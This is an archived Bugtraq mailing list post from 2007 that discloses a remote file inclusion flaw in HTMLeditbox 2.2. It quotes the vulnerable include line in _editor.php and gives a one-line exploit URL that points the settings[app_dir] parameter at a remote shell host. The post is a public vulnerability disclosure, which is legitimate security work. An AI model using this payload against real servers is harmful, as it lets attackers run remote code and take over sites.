Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

HTMLeditbox & 2.2 >> RFI

From: alijsb () yahoo com
Date: 25 Apr 2007 10:52:50 -0000
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php     @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
Previous By Date Next
Previous By Thread Next

Current thread: